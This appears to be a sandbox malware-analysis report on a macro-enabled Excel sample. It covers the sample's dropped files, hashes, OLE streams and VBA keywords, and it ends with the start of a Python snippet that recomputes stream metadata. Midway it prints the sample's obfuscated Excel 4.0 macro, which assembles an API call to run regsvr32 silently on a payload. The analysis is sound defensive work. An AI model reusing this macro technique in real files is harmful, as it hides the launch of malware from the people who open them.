                      SSDEEP:768:UAK3YYc0e76UlwEBwuOASEvIrC98rbqFqcO+hxOVPZKp42A205LEdT/C9WNJVTQY:d976UmE+uhBQrC98PGZHUnN5LaLTQDi9
                      MD5:138F4E0E9934BE4DA0426CB5321F0D7F
                      SHA1:84070B3A221BFB5C0DE40209E639669583CEC8C3
                      SHA-256:1D254C6FD6801C024975A8EEF3575FE869C3AC88AF910C27E24DCA3957243217
                      SHA-512:5E69E147D8439A637A11C9B2481E0778E65DA67BF1E059FB038266990E3B0C608E2DC8BD3BFE4D187191F8D54C138663EF215073FF872A9A68255091DC7C35A9
                      Malicious:false
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 01:27:51 2021, atime=Tue Jan 12 01:27:51 2021, length=12288, window=hide
                      Category:dropped
                      Size (bytes):867
                      Entropy (8bit):4.48075162575188
                      Encrypted:false
                      SSDEEP:12:85Q/k2kcLgXg/XAlCPCHaXtB8XzB/DhiUBEX+WnicvbsaRbDtZ3YilMMEpxRljKA:85dDK/XTd6jhhnEYehtDv3qNArNru/
                      MD5:B339C286696BE14A0BFB8FB5E272DD38
                      SHA1:F3CC42F0CD4D791395DF1E3D43223997C63E4D41
                      SHA-256:A352E71022A6431154D763D66924E48A7411E8F285071E107CAA18D18EAACDFB
                      SHA-512:85695DE99B0CC82045A566D3BE60B0DC43FE56ECE3B080992384C3DF51220EDEEDFFEA15E51ADEBA897996E1AE444C9A8E5FE34EA9512990A2D5B0594959B1D0
                      Malicious:false
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):106
                      Entropy (8bit):4.288085753919832
                      Encrypted:false
                      SSDEEP:3:oyBVomxWdxUNIVUYOhVdUNIVUYmxWdxUNIVUYv:djuSL1WLeSLC
                      MD5:3A4CD3A9401D75DF179FD5850F863649
                      SHA1:1036B9ABFAF918FB96990DA3DC6350DE5ADC5EAB
                      SHA-256:6A59F34635BEEEC2999D038D85914250458F714CB546BD29FCFA3CCA1B0E73EF
                      SHA-512:31AB0EE07F659FA4EAD5608CCF3C8E772918F24400EE013FE83838D8106BFDE4ED823B91D2C4464B108EB37F2FB15C71E9CB0EBC7AB3A2EFC469C253136D17D4
                      Malicious:false
                      Preview: Desktop.LNK=0..[misc]..sample20210111-01.LNK=0..sample20210111-01.LNK=0..[misc]..sample20210111-01.LNK=0..
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample20210111-01.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Jan 12 01:27:51 2021, atime=Tue Jan 12 01:27:59 2021, length=56539, window=hide
                      Category:dropped
                      Size (bytes):2108
                      Entropy (8bit):4.5041154003832595
                      Encrypted:false
                      SSDEEP:48:8Vos/XT0jFxEllGxVl1NAQh2Vos/XT0jFxEllGxVl1NAQ/:8ys/XojFxjLNAQh2ys/XojFxjLNAQ/
                      MD5:32B7E994BF13801BEBBC3697536E86AD
                      SHA1:0BF3648CA3A0DF2E5FF3FF1A57F3E20394314242
                      SHA-256:3FC1222BC12CBE95C2EFC8E5E43754912AAF46E37B1D17541FA2011FAA74F613
                      SHA-512:75F0D7763F12045792F8A68FF5DA3E40346814F53F7CCE1CD8EB11A0857C922A2156629B2BABA3FC8C57754DCB02596929248A9313E40F91497C0266E3C66AA9
                      Malicious:false
                      C:\Users\user\Desktop\B00F0000
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):56539
                      Entropy (8bit):7.850377009214
                      Encrypted:false
                      SSDEEP:1536:hXUl/i43FH4c93BUJn5r3i7ct2ObLNFqFWf:hO/dthFIdS7BO/AWf
                      MD5:8A3A81530F27C8EA5D3597C53C57E6DE
                      SHA1:9B7503B11FD8F95656380A3DC6B3056C8F07B7AA
                      SHA-256:4FF01EF2F667E67A0D88688505BD1B86BA3C89F90E792DB92A73BC4D15809EBC
                      SHA-512:E271FA1D22EA3AD8FA29F73D51EDC852F6EEC7C9E9992D12351AB58E59BF9AE0F1F09B2DDBA5FAD6063DE1368B4BDEB30423A0543E9D94EFF01EFB122329C455
                      Malicious:false
                      C:\Users\user\Desktop\~$sample20210111-01.xlsm
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):330
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                      Malicious:true
                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      Static File Info

                      General

                      File type:Microsoft Excel 2007+
                      Entropy (8bit):7.75941359400182
                      TrID:
                      • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                      • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                      • ZIP compressed archive (8000/1) 7.58%
                      File name:sample20210111-01.xlsm
                      File size:40268
                      MD5:fa5350d4304c4c2ceafa435244b5a5fc
                      SHA1:fc8a20962b8cf86568b1e85be02ee9c7b62d94b2
                      SHA256:0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d
                      SHA512:09cf2c537c358aea59a242b2b25129cc780bcc571e0ef611e2b1eb40078c1ff27356d1a45b1dd42249685e97b18e12173be2dde0e54bf4913fcce4b3703ea625
                      SSDEEP:768:1wTZYx6TBDUzVXaI4/ybclX7aV+uFdeq9AQxD2KL0gnp5zFVqJlZ:sa6aVXaPaG7zyvxDhLnzjqJlZ
                      File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                      File Icon

                      Icon Hash:e4e2aa8aa4bcbcac

                      Static OLE Info

                      General

                      Document Type:OpenXML
                      Number of OLE Files:2

                      OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm"

                      Indicators

                      Has Summary Info:False
                      Application Name:unknown
                      Encrypted Document:False
                      Contains Word Document Stream:
                      Contains Workbook/Book Stream:
                      Contains PowerPoint Document Stream:
                      Contains Visio Document Stream:
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Author:
                      Last Saved By:
                      Create Time:2020-12-07T14:38:21Z
                      Last Saved Time:2021-01-11T13:42:02Z
                      Creating Application:Microsoft Excel
                      Security:0

                      Document Summary

                      Thumbnail Scaling Desired:false
                      Company:
                      Contains Dirty Links:false
                      Shared Document:false
                      Changed Hyperlinks:false
                      Application Version:16.0300

                      Streams with VBA

                      VBA File Name: Module1.bas, Stream Size: 3215
                      General
                      Stream Path:VBA/Module1
                      VBA File Name:Module1.bas
                      Stream Size:3215
                      Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      VBA Code Keywords

                      Keyword
                      Integer:
                      bycilke()
                      VB_Name
                      MiV(sem.value)
                      homepodd()
                      homepodd
                      Error
                      Integer)
                      bycilke
                      Function
                      ol).Name
                      "!"):
                      String
                      "ab":
                      Split(govs,
                      Randomize:
                      yellowsto(yel
                      Next:
                      ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                      yellowsto(Oa))))
                      Integer
                      yellowsto
                      ol).value
                      nimo(Int((UBound(nimo)
                      Replace(Vo,
                      Chr(sem.Row)
                      Sheets(ol).Cells(homepodd,
                      "ab"))
                      Split(kij(ol),
                      yellowsto(homepodd))
                      Rnd))
                      (Run(""
                      "moreP_"
                      Variant)
                      Attribute
                      Resume
                      pagesREviewsd(Optional
                      ecimovert(nimo
                      ecimovert
                      MsgBox
                      VBA Code
                      VBA File Name: Sheet1.cls, Stream Size: 1614
                      General
                      Stream Path:VBA/Sheet1
                      VBA File Name:Sheet1.cls
                      Stream Size:1614
                      Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .

                      VBA Code Keywords

                      Keyword
                      Index
                      VB_Name
                      VB_Creatable
                      Application.OnTime
                      VB_Exposed
                      Long)
                      ResizePagess()
                      VB_Customizable
                      "REviewsd"
                      VB_Control
                      MultiPage"
                      VB_TemplateDerived
                      MSForms,
                      False
                      Attribute
                      Private
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      ResizePagess
                      "pages"
                      VBA Code
                      VBA File Name: ThisWorkbook.cls, Stream Size: 999
                      General
                      Stream Path:VBA/ThisWorkbook
                      VBA File Name:ThisWorkbook.cls
                      Stream Size:999
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      VBA Code Keywords

                      Keyword
                      False
                      VB_Exposed
                      Attribute
                      VB_Name
                      VB_Creatable
                      "ThisWorkbook"
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      VBA Code

                      Streams

                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 554
                      General
                      Stream Path:PROJECT
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:554
                      Entropy:5.25519546931
                      Base64 Encoded:True
                      Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 7 3 5 C 4 1 F C C 6 1 0 7 6 5 0 7 6 5 0 7 6 5 0 7 6 5 " . . D P B = " 6 E 6 C 9 D 6 8 E 3 A 8 1 B A 9 1 B A 9 1
                      Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                      General
                      Stream Path:PROJECTwm
                      File Type:data
                      Stream Size:86
                      Entropy:3.24455457963
                      Base64 Encoded:False
                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                      General
                      Stream Path:VBA/_VBA_PROJECT
                      File Type:data
                      Stream Size:3574
                      Entropy:4.46002460936
                      Base64 Encoded:False
                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                      Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                      Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                      General
                      Stream Path:VBA/__SRP_0
                      File Type:data
                      Stream Size:2060
                      Entropy:3.45134089702
                      Base64 Encoded:False
                      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . E . . . . . . C . _ . . . : . . . . . . . . . .
                      Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                      Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                      General
                      Stream Path:VBA/__SRP_1
                      File Type:data
                      Stream Size:187
                      Entropy:1.91493173134
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                      Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                      General
                      Stream Path:VBA/__SRP_2
                      File Type:data
                      Stream Size:363
                      Entropy:2.21122978445
                      Base64 Encoded:False
                      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                      Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                      General
                      Stream Path:VBA/__SRP_3
                      File Type:data
                      Stream Size:398
                      Entropy:2.07709195049
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                      Stream Path: VBA/dir, File Type: data, Stream Size: 820
                      General
                      Stream Path:VBA/dir
                      File Type:data
                      Stream Size:820
                      Entropy:6.5044215585
                      Base64 Encoded:True
                      Data ASCII:. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                      Data Raw:01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7f 90 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                      Macro 4.0 Code

                      CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                      
                      "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                      OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm"

                      Indicators

                      Has Summary Info:False
                      Application Name:unknown
                      Encrypted Document:False
                      Contains Word Document Stream:
                      Contains Workbook/Book Stream:
                      Contains PowerPoint Document Stream:
                      Contains Visio Document Stream:
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:False

                      Summary

                      Author:
                      Last Saved By:
                      Create Time:2020-12-07T14:38:21Z
                      Last Saved Time:2021-01-11T13:42:02Z
                      Creating Application:Microsoft Excel
                      Security:0

                      Document Summary

                      Thumbnail Scaling Desired:false
                      Company:
                      Contains Dirty Links:false
                      Shared Document:false
                      Changed Hyperlinks:false
                      Application Version:16.0300

                      Streams

                      Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                      General
                      Stream Path:\x1CompObj
                      File Type:data
                      Stream Size:115
                      Entropy:4.80096587863
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: f, File Type: data, Stream Size: 178
                      General
                      Stream Path:f
                      File Type:data
                      Stream Size:178
                      Entropy:2.59766210867
                      Base64 Encoded:False
                      Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                      Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 b0 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                      General
                      Stream Path:i02/\x1CompObj
                      File Type:data
                      Stream Size:110
                      Entropy:4.63372611993
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i02/f, File Type: data, Stream Size: 40
                      General
                      Stream Path:i02/f
                      File Type:data
                      Stream Size:40
                      Entropy:1.54176014818
                      Base64 Encoded:False
                      Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i02/o, File Type: empty, Stream Size: 0
                      General
                      Stream Path:i02/o
                      File Type:empty
                      Stream Size:0
                      Entropy:0.0
                      Base64 Encoded:False
                      Data ASCII:
                      Data Raw:
                      Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                      General
                      Stream Path:i03/\x1CompObj
                      File Type:data
                      Stream Size:110
                      Entropy:4.63372611993
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i03/f, File Type: data, Stream Size: 40
                      General
                      Stream Path:i03/f
                      File Type:data
                      Stream Size:40
                      Entropy:1.90677964945
                      Base64 Encoded:False
                      Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i03/o, File Type: empty, Stream Size: 0
                      General
                      Stream Path:i03/o
                      File Type:empty
                      Stream Size:0
                      Entropy:0.0
                      Base64 Encoded:False
                      Data ASCII:
                      Data Raw:
                      Stream Path: o, File Type: data, Stream Size: 152
                      General
                      Stream Path:o
                      File Type:data
                      Stream Size:152
                      Entropy:2.68720470607
                      Base64 Encoded:False
                      Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                      Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                      Stream Path: x, File Type: data, Stream Size: 48
                      General
                      Stream Path:x
                      File Type:data
                      Stream Size:48
                      Entropy:1.42267983198
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00
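The per-stream fields in the two listings above (entropy, and for the \x01CompObj streams the embedded object's CLSID and ProgID) can be recomputed from the Data Raw bytes the report prints. The Python below is an added example, not part of the report: it recomputes the Shannon entropy of the PROJECTwm stream and parses the two \x01CompObj streams following the CompObjStream layout in MS-OLEDS (a 28-byte header with the CLSID at offset 12, then length-prefixed ANSI strings for the user type, the clipboard format, and a third string the spec calls Reserved1 but which carries the ProgID in practice). The hex constants are copied from the listing; nothing else is assumed.

```python
"""Recompute stream metadata from the 'Data Raw' hex dumps in the report.

Added example, not code from the sandbox report. The three hex strings are
the PROJECTwm stream and the two \\x01CompObj streams as printed above.
"""
import math
import uuid
from collections import Counter

PROJECTWM_HEX = (
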